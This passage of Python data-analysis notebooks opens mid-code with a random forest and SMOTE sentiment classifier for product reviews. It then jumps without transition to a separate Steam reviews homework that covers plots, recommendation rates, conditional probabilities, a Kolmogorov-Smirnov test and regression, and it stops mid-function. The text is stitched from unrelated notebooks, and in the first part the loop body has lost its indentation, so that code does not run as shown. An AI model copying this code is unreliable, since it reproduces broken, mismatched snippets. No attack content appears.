from sklearn.metrics import accuracy_score, precision_score, recall_score, confusion_matrix, f1_score
# Instantiate classifier
rf = RandomForestClassifier(random_state=2)
# fit model on training data
rf.fit(X_train, y_train)
# predict on test data
y_pred = rf.predict(X_test)
# calculate the accuracy score
score = accuracy_score(y_test, y_pred)
# calculate the precision
precision = precision_score(y_test, y_pred)
# display 'score' and 'precision'
print(score, precision)
# import packages
from imblearn.over_sampling import SMOTE
# Instantiate smote
smote = SMOTE(random_state=9)
# fit_sample on training data
X_train, y_train = smote.fit_sample(X_train, y_train)
# fit model on training data
rf.fit(X_train, y_train)
# predict on test data
y_pred = rf.predict(X_test)
# calculate the accuracy score
score = accuracy_score(y_test, y_pred)
# calculate the precision
precision = precision_score(y_test, y_pred)
# display precision and score
print(score, precision)
```
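For reference, the precision reported above is TP / (TP + FP) for the positive class. A minimal plain-Python sketch of the metric (illustrative only, not the sklearn implementation):

```python
def precision(y_true, y_pred, positive=1):
    # Count true positives and false positives for the positive class
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == positive and p == positive)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t != positive and p == positive)
    return tp / (tp + fp) if (tp + fp) else 0.0

print(precision([1, 0, 1, 1], [1, 1, 1, 0]))  # 2 TP, 1 FP -> 2/3
```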
### Prediction on the test data and creating the sample submission file.
- Load the test data and store the `Id` column in a separate variable.
- Perform the same operations on the test data that you have performed on the train data.
- Create the submission file as a `csv` file consisting of the `Id` column from the test data and your prediction as the second column.
```
# Code Starts here
# Prediction on test data
# Read the test data
test = pd.read_csv('test.csv')
# Storing the id from the test file
id_ = test['Id']
# Apply the transformations on test
# Converting date attribute from string to datetime.date datatype
test['date'] = pd.to_datetime(test['date'])
# calculate the total length of word
test['length'] = test['verified_reviews'].apply(len)
# declare empty list 'corpus'
corpus=[]
# for loop to fill in corpus
for i in range(0,630):
# retain alphabets
review = re.sub('[^a-zA-Z]', ' ', test['verified_reviews'][i] )
# convert to lower case
review=review.lower()
# tokenize
review=review.split()
# initialize stemmer object
ps=PorterStemmer()
# perform stemming
review=[ps.stem(word) for word in review if not word in set(stopwords.words('english'))]
# join elements of list
review=' '.join(review)
# add to 'corpus'
corpus.append(review)
test = cv.transform(corpus).toarray()
# predict on test data
y_pred_test = rf.predict(test)
y_pred_test = y_pred_test.flatten()
# Create a sample submission file
sample_submission = pd.DataFrame({'Id':id_,'feedback':y_pred_test})
print(sample_submission.head())
# Convert the sample submission file into a csv file
sample_submission.to_csv('sample_submission_test.csv',index=False)
# Code ends here
```
```
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import math
import seaborn as sns
from datetime import datetime
from functools import reduce
from collections import Counter
import functions
from scipy.stats import ks_2samp
from scipy.stats import pearsonr
import statsmodels.api as sm
import statsmodels.formula.api as smf
pd.options.mode.chained_assignment = None
```
# Load the dataset
We load our dataset and, using the function **parsedate**, convert the timestamp columns to datetime.
```
dataset = pd.read_csv('steam_reviews.csv',
index_col=0,
parse_dates=['timestamp_created', 'timestamp_updated', 'author.last_played'],
date_parser=functions.parsedate)
dataset.head(20)
dataset.columns
dataset.shape
dataset.info()
```
# RQ1
### Exploratory Data Analysis (EDA)
To better understand our dataset, we made a number of plots and tables to extract information about the reviews received by the applications on Steam.
```
dataset.describe()
```
#### Most-reviewed applications:
To start our analysis we made a pie chart of the most-reviewed applications. We picked the thirty most-reviewed games and examined how the number of reviews is split between them. The percentages shown in the slices refer not to the total number of reviews but to the sum of reviews written for these thirty most popular games. We chose thirty to keep the plot clean and because we are interested only in the most popular, most talked-about games.
```
a = pd.Series(dataset.groupby("app_name").app_id.count().sort_values(ascending=False).head(30))
plt.rcParams['figure.figsize'] = (10, 10)
plt.pie(a,
labels = a.index,
explode = [0.1 for value in range(0, a.index.nunique())],
shadow = True, autopct = '%.1f%%')
plt.title('Application name', fontsize = 20)
plt.axis('off')
plt.show()
```
#### Correlation matrix:
Then we built a correlation matrix to check whether any variables are correlated with each other
```
fig, ax = plt.subplots(figsize=(13,13))
sns.heatmap(dataset.corr(), cbar=True, annot = True, cmap='BrBG', linewidths=.3,fmt='.1g')
```
We noticed no particular correlation between columns, except for the ones related to the player's playtime, so we decided to look at these correlations in depth for clearer information.
```
df = pd.DataFrame(dataset,columns=['author.playtime_forever','author.playtime_last_two_weeks',\
'author.playtime_at_review'])
corrMatrix = df.corr()
sns.heatmap(corrMatrix, annot=True)
plt.show()
```
#### Time and Language:
At this point we want to extract information about the language of the reviews and the time when they were written. We divided the day into three parts: morning (8am-2pm), afternoon (2pm-10pm) and night (10pm-8am).
For each part of the day we grouped the reviews by language, counted them, and picked the ten most popular languages.
In the final barplot, for each popular language we show the number of reviews written in each part of the day. We also made a table to better explain the numbers obtained.
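The three time slots can be expressed as a small helper mapping an hour to its slot (an equivalent sketch of the interval checks used in the notebook; `time_slot` is a hypothetical name):

```python
def time_slot(hour):
    # Morning 8am-2pm, afternoon 2pm-10pm, night 10pm-8am
    if 8 <= hour < 14:
        return "8am-2pm"
    if 14 <= hour < 22:
        return "2pm-10pm"
    return "10pm-8am"

print(time_slot(9), time_slot(15), time_slot(23), time_slot(3))
```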
```
arr_1 = dataset['timestamp_created'].dt.time
time_1 = [datetime.strptime('08:00:00', '%H:%M:%S').time(),
datetime.strptime('13:59:59', '%H:%M:%S').time()]
index_1 = [x for x in arr_1.index if (time_1[0] <= arr_1[x] <= time_1[1])]
time_2 = [datetime.strptime('14:00:00', '%H:%M:%S').time(),
datetime.strptime('21:59:59', '%H:%M:%S').time()]
index_2 = [x for x in arr_1.index if (time_2[0] <= arr_1[x] <= time_2[1])]
time_3 = [datetime.strptime('22:00:00', '%H:%M:%S').time(),
datetime.strptime('23:59:59', '%H:%M:%S').time(),
datetime.strptime('00:00:00', '%H:%M:%S').time(),
datetime.strptime('07:59:59', '%H:%M:%S').time()]
index_3 = [x for x in arr_1.index
if ((time_3[0] <= arr_1[x] <= time_3[1]) or
(time_3[2] <= arr_1[x] <= time_3[3]))]
# counting occurrences in the languages
mat1 = Counter((dataset['language'][index_1]).tolist())
pom1 = Counter((dataset['language'][index_2]).tolist())
not1 = Counter((dataset['language'][index_3]).tolist())
# sorting the occurrences
mat2 = {k: v for k, v in sorted(mat1.items(), key=lambda item: item[1], reverse=True)}
pom2 = {k: v for k, v in sorted(pom1.items(), key=lambda item: item[1], reverse=True)}
not2 = {k: v for k, v in sorted(not1.items(), key=lambda item: item[1], reverse=True)}
# taking only the first 10 languages, that happens to be the same for every time slot
mattina = list(mat2.items())[:10]
pomeriggio = list(pom2.items())[:10]
notte = list(not2.items())[:10]
# creating an empty dataframe with timeslots as cols and languages as indexes
df = pd.DataFrame(index=list(mat2.keys())[:10], columns=['8am-2pm', '2pm-10pm', '10pm-8am'])
# adding the values in the dataframe
for (couple1, couple2, couple3) in zip(mattina, pomeriggio, notte):
    df.loc[couple1[0], '8am-2pm'] = couple1[1]
    df.loc[couple2[0], '2pm-10pm'] = couple2[1]
    df.loc[couple3[0], '10pm-8am'] = couple3[1]
df.index.name = 'language'
df
ax = df.plot(y=["8am-2pm", "2pm-10pm", "10pm-8am"], kind="bar")
ax.set_yscale('log')
ax.set_xlabel('languages')
ax.set_ylabel("number reviews")
```
In this barplot we can see that the majority of the reviews are written during the afternoon, while during the night fewer people write on Steam. As expected, the most used language is English.
#### Viral Comments:
In this table we wanted to look at the ten reviews that received the most comments, because we thought it could be interesting to look at them to understand which reviews become popular on Steam.
```
dataset_7 = dataset.sort_values(by=['comment_count'], ascending = False)
dataset_7 = dataset_7.reset_index()
dataset_7[["author.steamid", "language", "app_name", "review", "comment_count"]].head(10)
```
Unfortunately the majority of them are not written in English!
#### Most played games:
Our dataset has a column storing the time each player has spent on a particular game. So we decided to explore which games are the most played in terms of hours. We picked the top 20 games because 20 seemed a good trade-off between a clean plot and a meaningful number of games.
```
dataset_8 = pd.Series(dataset.groupby("app_name")["author.playtime_forever"].sum().sort_values(ascending=False))
ore_di_gioco = dataset_8.values
giochi = dataset_8.index
plt.figure(figsize = ((15, 8)))
sns.barplot(x = ore_di_gioco[:20],
y = giochi[:20], orient = 'h')
plt.title('TOP 20 games more played in terms of hours', size = 20)
plt.ylabel('Games', size = 14, style = 'italic')
plt.xlabel('Number of hours', size = 14, style = 'italic')
#plt.xscale('log')
plt.xticks(np.arange(1000000000,60000000000,2000000000))
plt.show()
```
In this barplot we found some confirmation: the most played games are often also the most reviewed games that appeared in the pie chart.
#### Active players:
To conclude this first analysis we tried to understand which players are the most useful for Steam: we selected the ten authors that wrote the largest number of helpful and funny reviews.
```
dataset_9 = pd.Series(dataset[(dataset.votes_helpful > 0)].groupby("author.steamid").votes_helpful.count().sort_values(ascending=False))
dataset_10 = pd.Series(dataset[(dataset.votes_funny > 0)].groupby("author.steamid").votes_funny.count().sort_values(ascending=False))
pd.concat([dataset_9[:11], dataset_10[:11]], axis=1).reset_index().fillna(0).sort_values(by=['votes_helpful'],ascending=False).reset_index(drop = True)
```
It's interesting to see that the authors who wrote funny reviews also wrote helpful ones.
#### Languages and subplots
```
print("The total number of languages used to write reviews is ",'\033[1m' +str(len(dataset["language"].unique())) +'\033[0m')
```
With a subplot we can visualize all the languages present in the dataset and count their reviews. Note that the two subplots have different y-axis scales!
```
fig=plt.figure(figsize=(25,18))
ax1=fig.add_subplot(2,1,1)
dataset['language'].value_counts().head(10).plot.bar(figsize = (18, 10),title='Top 10 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax1,rot=0, logy = True, color = "orange")
ax2=fig.add_subplot(2,1,2)
dataset['language'].value_counts().iloc[-18:].plot.bar(figsize = (18, 10),title='Other 18 Languages',xlabel='Language',ylabel='Number of Reviews', ax = ax2,rot=0, color = "orchid")
fig.tight_layout();
```
# RQ2
### Plot the number of reviews for each application in descending order.
We made a barplot counting the number of reviews for the first 50 applications. We chose 50 because it seemed a good trade-off between a clean representation and picking the most reviewed games.
```
number_review = dataset.groupby("app_name").review_id.count().sort_values(ascending=False)
number_review[0:50].plot.bar(figsize = (18, 7), title=' Number of review', xlabel='Name of application',
ylabel='Number of review', color = "coral", logy = True)
plt.show()
# for a visual table to have an idea of how many reviews for the first 50 apps
number_review.reset_index().head(50)
```
### What applications have the best Weighted Vote Score?
Each review has a **Weighted Vote Score** that represents the helpfulness of that review. To extract a weighted vote score for each game we computed the mean over all the votes for each application. In this way we have an idea of which applications received the most helpful reviews. We then kept only average scores above 0.3, which we considered a good threshold for the best scores.
```
medie = pd.DataFrame(dataset.groupby("app_name").weighted_vote_score.mean().sort_values(ascending=False))
medie = medie[medie.values > 0.3]
medie
```
### Which applications have the most and the least recommendations
For this point, we considered the percentage values to be the relevant ones for the most and least recommended apps: an app is the most recommended if it has the highest percentage of recommending reviews.
```
#Most
# recommended. group_by app_name. count all recommended,
# count True recommended and False recommended in separate cols, and percentage of these.
# taking only the useful cols
new_data = dataset[['app_name', 'recommended']].copy()
# count_rec col counts all recommended respectively False and True of an application
new_data['count_rec'] = new_data.groupby(['app_name', 'recommended'], sort=False)['recommended'].transform('count')
# all_rec col counts all recommedations, False and True together
new_data['all_rec'] = new_data.groupby("app_name", sort=False)['count_rec'].transform('count')
# final dataframe which contains only the True recommendations
# this means that we can calculate the most and the least recommended apps
final = new_data[(new_data['recommended']==True)].drop_duplicates()
# perc_rec calculates the percentage recommendation
final['perc_rec'] = (final['count_rec']/final['all_rec'])*100
# drop not useful cols
final.drop(['recommended', 'count_rec'], axis=1, inplace=True)
# most recommended, first 50
final.sort_values(by='perc_rec', ascending=False).reset_index(drop=True).head(50)
```
We can see that the most recommended apps are not the ones with the most reviews.
```
# least recommended, first 50
final.sort_values(by='perc_rec', ascending=True).reset_index(drop=True).head(50)
```
### How many of these applications were purchased, and how many were given for free?
```
# steam_purchase
# taking only the useful cols
new_data1 = dataset[['app_name', 'steam_purchase']].copy()
# same modus operandi of counting recommendation
new_data1['count_pur'] = new_data1.groupby(['app_name', 'steam_purchase'], sort=False)['steam_purchase'].transform('count')
# taking only the ones purchased
final1 = new_data1[(new_data1['steam_purchase']==True)].drop_duplicates()
# drop not useful col
final1.drop(['steam_purchase'], axis=1, inplace=True)
# received_for_free
# taking only the useful cols
new_data2 = dataset[['app_name', 'received_for_free']].copy()
# same modus operandi
new_data2['count_free'] = new_data2.groupby(['app_name', 'received_for_free'], sort=False)['received_for_free'].transform('count')
# take only the ones received_for_free
final2 = new_data2[(new_data2['received_for_free']==True)].drop_duplicates()
# drop not useful col
final2.drop(['received_for_free'], axis=1, inplace=True)
# now it's time to calculate the final result, by doing a merge of the final dataframes
dfs = [final, final1, final2]
final_df = reduce(lambda left,right: pd.merge(left,right,on=['app_name'],
how='outer'), dfs)
# taking the first 40 apps that are most recommended and displaying how many times were
# purchased and how many times were received for free
final_df.sort_values(by='perc_rec', ascending=False).head(40)
# least recommended
final_df.sort_values(by='perc_rec').head(40)
```
# RQ3
### What is the most common time that authors review an application? For example, authors usually write a review at 17:44.
First of all, we take only the `timestamp_created` column and convert the time values to `string`. Then, with a simple dictionary and a `for` loop, we count the occurrences of every single time (HH:MM) and finally return only the most common time.
```
# first point
# taking only the timestamp_created col
timestamp_col = np.array(dataset["timestamp_created"].dt.time.astype('str'))
dict_time = {}
for time in timestamp_col:
    # taking only hour and minute
    new_time = time[:5]
    if new_time not in dict_time:
        dict_time[new_time] = 1
    else:
        dict_time[new_time] += 1
# sorting the dictionary in descending order
dict_time_sorted = {k: v for k, v in sorted(dict_time.items(), key=lambda item: item[1], reverse=True)}
# returning the most common time (without seconds)
next(iter(dict_time_sorted))
```
### Create a function that receives as a parameter a list of time intervals and returns a plot of the number of reviews for each of the intervals.
Using the function **orario** we can extract, for a given list of time intervals, the number of reviews written in each interval.
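The body of **orario** lives in the external `functions` module and is not shown here; below is a minimal sketch of what it might look like (the signature is an assumption: here the Series of times is passed explicitly instead of being read from the global dataset, and the interval list is taken as flat `(start, end)` pairs like the one used above):

```python
from datetime import datetime
import pandas as pd

def orario(times, intervalli, plot=True):
    """Sketch: count the reviews falling in each time interval and bar-plot them.
    `times` is a Series of datetime.time values; `intervalli` is a flat list of
    'HH:MM:SS' strings read as consecutive (start, end) pairs."""
    bounds = [datetime.strptime(t, '%H:%M:%S').time() for t in intervalli]
    counts = {}
    for start, end in zip(bounds[::2], bounds[1::2]):
        # elementwise comparison of datetime.time values
        counts[start.strftime('%H:%M')] = int(((times >= start) & (times <= end)).sum())
    if plot:
        import matplotlib.pyplot as plt  # imported here so the counting works without matplotlib
        pd.Series(counts).plot.bar(xlabel='interval start', ylabel='number of reviews')
        plt.show()
    return counts
```

With this sketch, `orario(dataset['timestamp_created'].dt.time, intervalli)` would reproduce the kind of barplot shown below.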
### Use the function that you created in the previous literal to plot the number of reviews between the following time intervals:
```
intervalli = ['06:00:00', '10:59:59', '11:00:00', '13:59:59', '14:00:00', '16:59:59',
'17:00:00', '19:59:59', '20:00:00', '23:59:59', '00:00:00', '02:59:59', '03:00:00',
'05:59:59']
functions.orario(intervalli)
```
On the x-axis, each bar is labelled with the starting point of its time interval. We observed that fewer people wrote reviews during the night, while the majority wrote their reviews in the first hours of the morning and around dinner time.
# RQ4
### What are the top 3 languages used to review applications?
```
top_languages = pd.DataFrame(dataset.groupby("language").review_id.count().sort_values(ascending=False).head(3))
top_languages
```
As expected, the majority of the reviews are written in English, Chinese and Russian!
```
top_languages = list(top_languages.index)
top_languages
```
### Create a function that receives as parameters both the name of a data set and a list of languages’ names and returns a data frame filtered only with the reviews written in the provided languages.
Here we used the function **get_reviews_by_languages** to obtain a dataframe containing only the reviews written in the top 3 languages.
```
dataset_filter = functions.get_reviews_by_languages(dataset, top_languages)
```
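The body of **get_reviews_by_languages** is kept in the external `functions` module; a one-line sketch of what it plausibly does with `Series.isin` (the implementation is our assumption, not the module's actual code):

```python
import pandas as pd

def get_reviews_by_languages(dataset, languages):
    """Keep only the reviews whose `language` column is in the given list."""
    return dataset[dataset['language'].isin(languages)]
```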
### Use the function created in the previous literal to find what percentage of these reviews (associated with the top 3 languages) were voted as funny?
For this request we used the new filtered dataset: for each language we selected the reviews that received at least one funny vote and then computed the ratio between them and all the reviews written in that language.
To compute this percentage we used **dataset_filter**, the dataframe obtained with the previous function **get_reviews_by_languages**.
```
numeratore_1 = []
denominatore_1 = []
rapporto_1 = []
for i in range(len(top_languages)):
    numeratore_1.append(dataset_filter.loc[(dataset_filter.votes_funny != 0) & (dataset_filter.language == top_languages[i])].votes_funny.count())
    denominatore_1.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_funny.count())
    rapporto_1.append(round((numeratore_1[i]/denominatore_1[i])*100, 2))
    print("The percentage of reviews written in " + '\033[1m' + top_languages[i] + '\033[0m' +
          " that have received at least one funny vote is " +
          '\033[1m' + str(rapporto_1[i]) + "%" + '\033[0m')
```
At this point we also computed the percentage of reviews that received at least one funny vote across all three languages.
```
# same as above
print("The percentage of reviews written in one of the top 3 languages that have received at "
      "least one funny vote is " + '\033[1m' + str(round((sum(numeratore_1)/sum(denominatore_1))*100, 2)) + "%" + '\033[0m')
```
### Use the function created in the literal “a” to find what percentage of these reviews (associated with the top 3 languages) were voted as helpful?
For this request we again used the filtered dataset: for each language we selected the reviews that received at least one helpful vote and then computed the ratio between them and all the reviews written in that language.
To compute this percentage we used **dataset_filter**, the dataframe obtained with the previous function **get_reviews_by_languages**.
```
numeratore_2 = []
denominatore_2 = []
rapporto_2 = []
for i in range(len(top_languages)):
    numeratore_2.append(dataset_filter.loc[(dataset_filter.votes_helpful != 0) & (dataset_filter.language == top_languages[i])].votes_helpful.count())
    denominatore_2.append(dataset_filter[dataset_filter.language == top_languages[i]].votes_helpful.count())
    rapporto_2.append(round((numeratore_2[i]/denominatore_2[i])*100, 2))
    print("The percentage of reviews written in " + '\033[1m' + top_languages[i] + '\033[0m' +
          " that have received at least one helpful vote is " +
          '\033[1m' + str(rapporto_2[i]) + "%" + '\033[0m')
```
At this point we also computed the percentage of reviews that received at least one helpful vote across all three languages.
```
# same as above
print("The percentage of reviews written in one of the top 3 languages that have received at "
      "least one helpful vote is " + '\033[1m' + str(round((sum(numeratore_2)/sum(denominatore_2))*100, 2)) + "%" + '\033[0m')
```
# RQ5
### Plot the top 10 most popular reviewers and the number of reviews.
```
num_reviewers = dataset['author.steamid'].value_counts().head(10)
num_reviewers.plot(kind='bar',
xlabel='TOP 10 reviewers',
ylabel='number of reviews')
```
### What applications did the most popular author review?
At first, we took the most popular author from the previous result, kept only the rows of the reviews written by him/her, and then returned all the applications reviewed by this author.
```
num_rev = pd.DataFrame({'reviewers':num_reviewers.index, 'num_reviews':num_reviewers.values})
pop_auth = num_rev['reviewers'][0]
apps_rev = dataset[dataset['author.steamid'] == pop_auth].app_name
app_name_rev = list(Counter(apps_rev.values))  # unique app names, in order of first appearance
print(app_name_rev)
```
### How many applications did he/she purchase, and how many did he/she get as free? Provide the number (count) and the percentage.
```
# taking only the steam_purchase and received_for_free apps of the author
app_count = dataset[dataset['author.steamid'] == pop_auth][['steam_purchase', 'received_for_free']]
# how many apps did the author review
tot_app_rev = len(app_count.index)
purchased = dict(Counter(app_count['steam_purchase']))
free_apps = dict(Counter(app_count['received_for_free']))
purchased[True] = [purchased[True], "{:.2%}".format(purchased[True]/tot_app_rev)]
purchased[False] = [purchased[False], "{:.2%}".format(purchased[False]/tot_app_rev)]
free_apps[True] = [free_apps[True], "{:.2%}".format(free_apps[True]/tot_app_rev)]
free_apps[False] = [free_apps[False], "{:.2%}".format(free_apps[False]/tot_app_rev)]
purch_df = pd.DataFrame(purchased, index=['count', 'Percentage']).T
free_df = pd.DataFrame(free_apps, index=['count', 'Percentage']).T
purch_df.index.name = 'App Purchased'
free_df.index.name = 'App given Free'
purch_df
```
`True` means that the apps were purchased, `False` that they were not.
```
free_df
```
`True` means that the apps were given for free, `False` that they were not.
There is a significant difference between the purchased and the free apps: most apps were purchased on Steam, while only 4 were given for free. This means that not every app the author reviewed was purchased on Steam: if we assume that all the purchased apps are also counted among the "not given for free" ones, then 35 apps were purchased somewhere else; adding the 4 apps given for free, we get all 39 apps not purchased on Steam.
### How many of the applications he/she purchased reviewed positively, and how many negatively? How about the applications he received for free?
```
# have to use the recommended col
app_recomm = dataset.loc[(dataset['author.steamid'] == pop_auth) & (dataset['recommended'] == True)][['steam_purchase', 'received_for_free']]
purchased_rec = dict(Counter(app_recomm['steam_purchase']))
free_apps_rec = dict(Counter(app_recomm['received_for_free']))
tot_app_rec = len(app_recomm.index)
print('{} applications purchased were reviewed positively, and {} were reviewed negatively'
.format(purchased_rec[True], purchased_rec[False]))
print('{} applications given for free were reviewed positively, and {} were reviewed negatively'
.format(free_apps_rec[True], free_apps_rec[False]))
```
Comparing these results with the previous question, we can see that 3 apps were reviewed neither positively nor negatively; using the same hypothesis as in the previous answer, 2 of them were purchased on Steam and 1 elsewhere. We can also see that all the apps given for free were reviewed positively, which means that the author liked playing them (and, we assume, also liked their quality of being "free").
# RQ6
### What is the average time (days and minutes) a user lets pass before he updates a review?
To start, we computed the difference between the time when the review was written and the time when it was updated, and then converted this difference into days.
```
dataset['difference_days'] = (dataset['timestamp_updated'] - dataset['timestamp_created'])
dataset['difference_days'] = dataset['difference_days']/np.timedelta64(1,'D')
```
After that we removed the reviews that were never updated, because we considered them meaningless for this question. Then we computed the mean of the day differences: the integer part of this number is the average number of days after which an author updates his review. To convert the decimal part into minutes we multiply it by 1440, since one day contains 1440 minutes; it is a simple proportion: *1 : 1440 = (decimal part) : x*.
```
dataset_1 = dataset[dataset.difference_days != 0]
average = dataset_1.difference_days.mean()
minutes = round((average % 1) * 1440)
days = int(average)
print("The average time a user lets pass before he updates a review is "+
'\033[1m' + str(days) + '\033[0m' + " days and " + '\033[1m' + str(minutes) + '\033[0m' + " minutes")
```
On average an author updates his review after almost a year!
### Plot the top 3 authors that usually update their reviews.
We used the dataframe **dataset_1**, which contains only the reviews that have been updated. We did not use the original dataset because we need the authors that usually update their reviews, i.e. the authors that have updated the most reviews over time.
```
a = pd.Series(dataset_1.groupby('author.steamid').review_id.count().sort_values(ascending=False).head(3))
a
#bar plot
plt.figure(figsize=(12, 8))
ax = a.plot(kind="bar", color = ["orchid", "orange", "green"], alpha=0.75, rot=0)
ax.set_title("TOP 3 authors that have updated more reviews")
ax.set_xlabel("Steam ID")
ax.set_ylabel("Number of reviews updated")
#needed to put values on top of the bar
for i, v in enumerate(a.values):
    ax.text(i, v+1, str(v), color='black', fontweight='bold')
```
We put the number of reviews on top of the bars because the second and third authors updated almost the same number of reviews.
# RQ7
### What’s the probability that a review has a Weighted Vote Score equal to or bigger than 0.5?
We used the classical definition of probability to compute this value: we counted the number of reviews with a Weighted Vote Score equal to or bigger than 0.5, i.e. the favourable cases (stored in **casi_fav**), while the total number of cases is the number of rows of our dataset (stored in **casi_tot**). The probability is the ratio between them.
```
#filter the dataset picking only weighted_vote_score >= 0.5
#and count the rows of filter dataset
casi_fav = dataset[dataset.weighted_vote_score >= 0.5].weighted_vote_score.count()
#number of rows of initial dataset
casi_tot = dataset.weighted_vote_score.count()
result_1 = round(casi_fav/casi_tot, 2)
print("The probability that a review has a Weighted Vote Score equal to or bigger than 0.5 is "+ '\033[1m' +str(result_1)+'\033[0m')
```
### What’s the probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5?
We want to compute the conditional probability P(B|A), where B is the event *a review has at least one vote as funny* and A is *the Weighted Vote Score is bigger than 0.5*. The sample space is reduced: we filtered the dataset so that we look for reviews with at least one funny vote only among the reviews whose Weighted Vote Score is bigger than 0.5.
```
#new sample space: filter dataset like before
# A
dataset_prob = dataset[dataset.weighted_vote_score > 0.5]
#count the reviews with at least a funny vote in the new filter dataset
#B intersect A
casi_fav_2 = dataset_prob[dataset_prob.votes_funny != 0].votes_funny.count()
#A
casi_tot2 = dataset_prob.weighted_vote_score.count()
#P(B|A)
result_2 = round(casi_fav_2/casi_tot2, 2)
print("The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is bigger than 0.5 is ",'\033[1m' +str(result_2)+'\033[0m')
```
### Is the probability that “a review has at least one vote as funny” independent of the “probability that a review has a Weighted Vote Score equal or bigger than 0.5"?
For these two events to be independent, the probability of the event B, *a review has at least one vote as funny*, would have to equal the probability of B given that the Weighted Vote Score is equal to or bigger than 0.5 (event A): in that case the conditioning is irrelevant, i.e. P(B|A) = P(B).
```
#P(B|A)
casi_fav_ba = dataset[(dataset.weighted_vote_score >= 0.5) & (dataset.votes_funny != 0)].votes_funny.count()
result_3a = round(casi_fav_ba/casi_fav, 2)
print("The conditional probability that a review has at least one vote as funny given that the Weighted Vote Score is equal or bigger than 0.5 is ",'\033[1m' +str(result_3a)+'\033[0m')
#count the reviews with at least a funny vote in the starting dataset
#B
casi_fav_3 = dataset[dataset.votes_funny != 0].votes_funny.count()
#P(B)
result_3 = round(casi_fav_3/casi_tot,2)
print("The probability of a review has at least one vote as funny is "+ '\033[1m' +str(result_3)+'\033[0m')
```
0.12 is different from 0.25, so these two events are **dependent!**
# RQ8
### Is there a significant difference in the Weighted Vote Score of reviews made in Chinese vs the ones made in Russian? Use an appropriate statistical test or technique and support your choice.
We'll use a non-parametric test (Kolmogorov-Smirnov) to find out whether the two distributions are the same (i.e. come from the same population) or not, since the two distributions are not normally distributed.
```
data_lang = functions.get_reviews_by_languages(dataset,["schinese","russian"])
```
First of all we compare the Chinese and Russian weighted vote score distributions using histograms. At first glance there does not seem to be any significant difference between the two distributions: from this plot they seem to be distributed equally.
```
plt.figure(figsize = (10,8))
data_lang[data_lang.language == "schinese"].weighted_vote_score.plot(kind = "hist", label = "Chinese",alpha = 0.3)
data_lang[data_lang.language == "russian"].weighted_vote_score.plot(kind = "hist", label = "Russian", color = "orange",alpha = 0.3)
plt.legend()
```
So we support this impression with a statistical test: let's check with the KS test.
```
k_smir_test = ks_2samp(data_lang[data_lang.language == "schinese"].weighted_vote_score,
data_lang[data_lang.language == "russian"].weighted_vote_score)
if k_smir_test.pvalue <= 0.1:
    print(f"the two distributions are different (H0 rejected, pvalue = {k_smir_test.pvalue})")
else:
    print(f"the two distributions are compatible with the same population (pvalue = {k_smir_test.pvalue})")
```
The Kolmogorov-Smirnov test is a non-parametric test that compares the shapes of sample distributions. It can be used to compare two samples and does not itself require any assumption about the sample distribution, as in our case. Accepting the H0 hypothesis means that the two distributions belong to the same population.
### Can you find any significant relationship between the time that a user lets pass before he updates the review and the Weighted Vote Score? Use an appropriate statistical test or technique and support your choice.
We'll check whether there is a relationship in 3 steps:
* plot
* Pearson correlation
* linear regression
```
# step 1: plot
plt.figure(figsize = (10,8))
plt.scatter(dataset.difference_days, dataset.weighted_vote_score)
print("no relationship visible")
# step 2: pearson correlation
print(pearsonr(dataset.difference_days, dataset.weighted_vote_score))
print("no relations detected ")
X = dataset[["difference_days"]]
X = sm.add_constant(X).values
model = sm.OLS(dataset.weighted_vote_score, X)
res = model.fit()
res.summary()
```
Using simple linear regression (one X variable) is the same as using pearsonr, because
$R^{2} = (\text{pearsonr})^2$.
```
p = pearsonr(dataset.difference_days, dataset.weighted_vote_score)
print(f"pearsonr {p[0]}\npearsonr^2 = {p[0]**2} -> same as R-squared detected above")
```
The second test is linear regression: also in this case there is no evidence of any correlation between the two variables.
### Is there any change in the relationship of the variables mentioned in the previous literal if you include whether an application is recommended or not in the review? Use an appropriate statistical test or technique and support your choice.
We just add another variable to the linear regression:
```
X = dataset[["difference_days","recommended","weighted_vote_score"]].astype({"recommended":int})
model = smf.ols("weighted_vote_score ~ difference_days + C(recommended)", data=X)
res = model.fit()
res.summary()
```
No changes in the relationships.
### What are histograms, bar plots, scatterplots and pie charts used for?
Histogram: this type of data visualization helps interpret univariate analysis results. Simply put, it shows where data points are dense and where they are sparse in one dimension. Instead of comparing categorical data, it breaks a numeric variable into interval groups and shows the frequency of the data falling into each group. A histogram is good at identifying the pattern of a data distribution on a numeric spectrum.
Bar chart: a bar chart compares a measure across a categorical dimension. It is very similar to a histogram; the fundamental difference is that the x-axis of a bar chart is a categorical attribute instead of the numeric intervals of a histogram. Furthermore, a bar chart is not limited to one categorical variable: an extension, the clustered (or grouped) bar chart, compares two categorical attributes.
Scatterplot: it plots one numeric attribute against another and visualizes the correlation between the axes. Scatter plots are commonly used to identify regression-type relationships (linear regression, logistic regression, etc.) and give a first visual assessment of correlation: the linear relationship is stronger when the data points lie close to a sloped line, and weak when the cloud is flat or shapeless.
Pie chart: it represents the percentage and weight of the components of one categorical attribute. The size of a pie slice is proportional to its percentage, so it intuitively depicts how much of the whole each component occupies.
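The distinction between binning a numeric variable (histogram) and counting a categorical one (bar chart) can be made concrete with a small sketch (the values are made up for illustration):

```python
import numpy as np
from collections import Counter

# A histogram bins a *numeric* variable into interval groups...
values = [1.2, 1.9, 2.5, 3.1, 3.3, 9.8]        # e.g. made-up playtimes
counts, edges = np.histogram(values, bins=3)   # frequencies over 3 equal-width intervals

# ...while a bar chart counts a *categorical* variable directly.
categories = ['english', 'russian', 'english', 'schinese']
bar_heights = Counter(categories)              # category -> frequency
```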
### What insights can you extract from a Box Plot?
A box plot shows the distribution of the data with more detailed information: from it we can extract the outliers, maximum, minimum, first quartile (Q1), third quartile (Q3), interquartile range (IQR) and median. It also gives information about the skewness of the data, how tightly packed the data are and their spread.
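These quantities can also be computed directly; a small sketch using Tukey's 1.5·IQR rule for the whisker fences (the helper name is ours, not from the notebook):

```python
import numpy as np

def boxplot_stats(data):
    """Compute the quantities a box plot displays: quartiles, IQR,
    whisker fences and outliers (Tukey's 1.5*IQR rule)."""
    q1, median, q3 = np.percentile(data, [25, 50, 75])
    iqr = q3 - q1
    lower, upper = q1 - 1.5 * iqr, q3 + 1.5 * iqr
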